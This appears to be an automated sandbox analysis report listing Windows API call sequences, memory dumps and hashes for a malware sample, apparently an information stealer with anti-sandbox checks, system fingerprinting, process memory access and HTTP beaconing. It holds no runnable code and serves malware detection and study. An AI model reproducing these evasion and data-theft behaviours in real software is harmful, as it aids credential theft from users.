                                              • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                              • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                              • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A51
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A68
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A7F
                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 047E4AA0
                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 047E4AB0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ??2@$CrackInternetlstrlen
                                              • String ID: <
                                              • API String ID: 1683549937-4251816714
                                              • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                              • Instruction ID: 1231da9f8c130e0b7c473ea151c0a0d5d0a89adbcadd1cf73fa95fb304fe982c
                                              • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                              • Instruction Fuzzy Hash: 21213BB5D00219ABDF14DFA4EC49AED7B74FF44321F108225E929A7390EB706A05CF91
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                              • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                              • RegOpenKeyExA.ADVAPI32(80000002,02BB8690,00000000,00020119,00000000), ref: 004176DD
                                              • RegQueryValueExA.ADVAPI32(00000000,02BE93B8,00000000,00000000,?,000000FF), ref: 004176FE
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID: Windows 11
                                              • API String ID: 3466090806-2517555085
                                              • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                              • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                              • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                              • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 047F790B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F7912
                                              • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 047F7944
                                              • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 047F7965
                                              • RegCloseKey.ADVAPI32(00000000), ref: 047F796F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID: Windows 11
                                              • API String ID: 3225020163-2517555085
                                              • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                              • Instruction ID: 04035912af97512bf27be74781d4f981da5f2cc6b62d2ebeecfb2f74967aa6b2
                                              • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                              • Instruction Fuzzy Hash: A1012CBDA80204BBEB14DBE4DD49FADB7B9EB48701F009154BA0596380D674A900CB51
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                              • RegOpenKeyExA.ADVAPI32(80000002,02BB8690,00000000,00020119,004176B9), ref: 0041775B
                                              • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                              • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID: CurrentBuildNumber
                                              • API String ID: 3466090806-1022791448
                                              • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                              • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                              • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                              • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                              APIs
                                              • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                              • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                              • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID: :A$:A
                                              • API String ID: 1378416451-1974578005
                                              • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                              • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                              • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                              • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 047E75A1
                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 047E7618
                                              • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 047E7674
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 047E76B9
                                              • HeapFree.KERNEL32(00000000), ref: 047E76C0
                                                • Part of subcall function 047E94A7: vsprintf_s.MSVCRT ref: 047E94C2
                                              • task.LIBCPMTD ref: 047E77BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                              • String ID:
                                              • API String ID: 700816787-0
                                              • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                              • Instruction ID: 93d20f9b88bed8635a693eba4b630c46e0cd628cd2e725c078c1ca574e0b943f
                                              • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                              • Instruction Fuzzy Hash: 5561FCB59001689BEB24DF51CC55FE9B7B8BF48304F0082E9E649A6240EBB06BC5CF95
                                              APIs
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 047E6548
                                                • Part of subcall function 047E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 047E656A
                                                • Part of subcall function 047E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 047E659C
                                                • Part of subcall function 047E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 047E65EC
                                                • Part of subcall function 047E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 047E6626
                                                • Part of subcall function 047E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 047E6638
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 047F557F
                                              • lstrlen.KERNEL32(00000000), ref: 047F5596
                                                • Part of subcall function 047F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 047F90B9
                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 047F55CB
                                              • lstrlen.KERNEL32(00000000), ref: 047F55EA
                                              • strtok.MSVCRT(00000000,?), ref: 047F5605
                                              • lstrlen.KERNEL32(00000000), ref: 047F5615
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                              • String ID:
                                              • API String ID: 3532888709-0
                                              • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                              • Instruction ID: 1ed1e1bf088dc362d544d9710f11e7a4b328f782243d556f44adc07d1ef0b7b8
                                              • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                              • Instruction Fuzzy Hash: B851EF70910248EBDB28FFA0CEA9EED7775AF14308F904128E60966790DF347B49CB51
                                              APIs
                                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 047F7345
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,047F7574,004205BD), ref: 047F7383
                                              • memset.MSVCRT ref: 047F73D1
                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 047F7525
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: OpenProcesslstrcpymemset
                                              • String ID:
                                              • API String ID: 224852652-0
                                              • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                              • Instruction ID: 079e356cd3e9b9ef4d1696367cf8484ec48fb8e4e27c618879fec5ef38f8f1a3
                                              • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                              • Instruction Fuzzy Hash: 4D514FB0D00218DBDB28EBA4DC94BEDB774AF44305F5045A9D60977381EB747A88CF54
                                              APIs
                                              • memset.MSVCRT ref: 004140D5
                                              • RegOpenKeyExA.ADVAPI32(80000001,02BE9C88,00000000,00020119,?), ref: 004140F4
                                              • RegQueryValueExA.ADVAPI32(?,02BE9760,00000000,00000000,00000000,000000FF), ref: 00414118
                                              • RegCloseKey.ADVAPI32(?), ref: 00414122
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                              • lstrcatA.KERNEL32(?,02BE9640), ref: 0041415B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                              • String ID:
                                              • API String ID: 2623679115-0
                                              • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                              • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                              • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                              • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                              APIs
                                              • memset.MSVCRT ref: 047F433C
                                              • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 047F435B
                                              • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 047F437F
                                              • RegCloseKey.ADVAPI32(?), ref: 047F4389
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F43AE
                                              • lstrcat.KERNEL32(?,0064A168), ref: 047F43C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                              • String ID:
                                              • API String ID: 2623679115-0
                                              • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                              • Instruction ID: d9d31f9cda494cff22e78956d51608eff7f406efe1ef4c73a2f7020234e056e6
                                              • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                              • Instruction Fuzzy Hash: 3841B6BA940108BBEB14FBE0DC4AFEE737DAB5D700F00455CA71557280EA7567988BE2
                                              APIs
                                              • strtok_s.MSVCRT ref: 00413588
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • strtok_s.MSVCRT ref: 004136D1
                                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02BE5AC0,?,0042110C,?,00000000), ref: 0041A82B
                                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpystrtok_s$lstrlen
                                              • String ID:
                                              • API String ID: 3184129880-0
                                              • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                              • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                              • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                              • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                              APIs
                                              • __lock.LIBCMT ref: 0041B39A
                                                • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0E8,0000000C,0041AC2A), ref: 0041AFD6
                                              • DecodePointer.KERNEL32(0042A128,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                              • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E8,0000000C,0041AC2A), ref: 0041B3E7
                                                • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                              • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E8,0000000C,0041AC2A), ref: 0041B40D
                                              • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E8,0000000C,0041AC2A), ref: 0041B420
                                              • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E8,0000000C,0041AC2A), ref: 0041B42A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 2005412495-0
                                              • Opcode ID: 77b59375059fb19d1a073c6dff295e6bcc5e5e0287227a3a5c41dc684eee82d2
                                              • Instruction ID: e00affa612ca6ec41e4c7da5a662c55dafc0fe4f05efa3c1b018851ea7cc57b8
                                              • Opcode Fuzzy Hash: 77b59375059fb19d1a073c6dff295e6bcc5e5e0287227a3a5c41dc684eee82d2
                                              • Instruction Fuzzy Hash: 96311774901349DFDF109FA9C9452DEBAF1FB48314F14802BE414A6262CBB94895DFAE
                                              APIs
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 047F9B08
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 047F9B21
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 047F9B39
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 047F9B51
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 047F9B6A
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 047F9B82
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 047F9B9A
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 047F9BB3
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 047F9BCB
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 047F9BE3
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 047F9BFC
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 047F9C14
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 047F9C2C
                                                • Part of subcall function 047F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 047F9C45
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047E1437: ExitProcess.KERNEL32 ref: 047E1478
                                                • Part of subcall function 047E13C7: GetSystemInfo.KERNEL32(?), ref: 047E13D1
                                                • Part of subcall function 047E13C7: ExitProcess.KERNEL32 ref: 047E13E5
                                                • Part of subcall function 047E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 047E1392
                                                • Part of subcall function 047E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 047E1399
                                                • Part of subcall function 047E1377: ExitProcess.KERNEL32 ref: 047E13AA
                                                • Part of subcall function 047E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 047E14A5
                                                • Part of subcall function 047E1487: __aulldiv.LIBCMT ref: 047E14BF
                                                • Part of subcall function 047E1487: __aulldiv.LIBCMT ref: 047E14CD
                                                • Part of subcall function 047E1487: ExitProcess.KERNEL32 ref: 047E14FB
                                                • Part of subcall function 047F69D7: GetUserDefaultLangID.KERNEL32 ref: 047F69DB
                                                • Part of subcall function 047E13F7: ExitProcess.KERNEL32 ref: 047E142D
                                                • Part of subcall function 047F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,047E141E), ref: 047F7AE7
                                                • Part of subcall function 047F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 047F7AEE
                                                • Part of subcall function 047F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 047F7B06
                                                • Part of subcall function 047F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 047F7B77
                                                • Part of subcall function 047F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 047F7B7E
                                                • Part of subcall function 047F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 047F7B96
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 047F6D31
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 047F6D4F
                                              • CloseHandle.KERNEL32(00000000), ref: 047F6D60
                                              • Sleep.KERNEL32(00001770), ref: 047F6D6B
                                              • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 047F6D81
                                              • ExitProcess.KERNEL32 ref: 047F6D89
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                              • String ID:
                                              • API String ID: 2525456742-0
                                              • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                              • Instruction ID: af00dbd0fbc7f5a000af5676414795fcb3d76926d2e7697a7d4ab7b5bc3a5407
                                              • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                              • Instruction Fuzzy Hash: 3E313A75A40208ABEB14FBF0DC59FFD7379AF59308F504518A306A6390EF747A09CA61
                                              APIs
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 2311089104-0
                                              • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                              • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                              • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                              • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                              APIs
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 047E9C53
                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 047E9C78
